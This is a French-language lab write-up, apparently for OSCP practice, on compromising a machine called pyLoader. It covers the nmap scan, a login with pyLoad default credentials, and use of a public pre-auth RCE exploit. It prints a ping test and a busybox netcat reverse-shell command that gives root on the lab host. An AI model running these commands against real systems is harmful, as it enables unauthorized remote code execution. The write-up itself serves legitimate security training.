pyLoader

pyloader

Nom machine : pyLoader
Difficulté : Intermédiaire
OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 17:00 EDT
Nmap scan report for 192.168.208.26
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
9666/tcp open  http    CherryPy wsgiserver
| http-title: Login - pyLoad 
|_Requested resource was /login?next=http://192.168.208.26:9666/
|_http-server-header: Cheroot/8.6.0
| http-robots.txt: 1 disallowed entry 
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CherryPy (9666)

On tombe sur une page pour nous connecter. On test admin:admin sans succès puis nous avons chercher sur google les "default credentials" : pyload:pylaod. Cela fonctionne !

Dans la page info nous obtenons le numéro de version. On trouve un exploit correspondant, ne nécessitant pas d'authentification.

Accès initial

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)Exploit Database

┌──(kali㉿kali)-[~/oscp/pyload]
└─$ python script.py -u http://192.168.208.26:9666 -c 'ping -c2 192.168.45.224'
[+] Check if target host is alive: http://192.168.208.26:9666
[+] Host up, let's exploit! 
[+] The exploit has be executeded in target machine.

┌──(kali㉿kali)-[~/oscp]
└─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
17:10:00.528911 IP 192.168.208.26 > 192.168.45.224: ICMP echo request, id 1, seq 1, length 64
17:10:00.528961 IP 192.168.45.224 > 192.168.208.26: ICMP echo reply, id 1, seq 1, length 64
17:10:01.530841 IP 192.168.208.26 > 192.168.45.224: ICMP echo request, id 1, seq 2, length 64
17:10:01.530880 IP 192.168.45.224 > 192.168.208.26: ICMP echo reply, id 1, seq 2, length 64

Il fonctionne bien, nous allons donc essayer d'obtenir un reverse shell.

┌──(kali㉿kali)-[~/oscp/pyload]
└─$ python script.py -u http://192.168.208.26:9666 -c 'busybox nc 192.168.45.224 22 -e /bin/bash'

┌──(kali㉿kali)-[~/oscp]
└─$ nc -lnvp 22  
listening on [any] 22 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.208.26] 33220
whoami
root

PrécédentPress SuivantResourced

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagCherryPy (9666)

hashtagAccès initial

Enumération

NMAP

CherryPy (9666)

Accès initial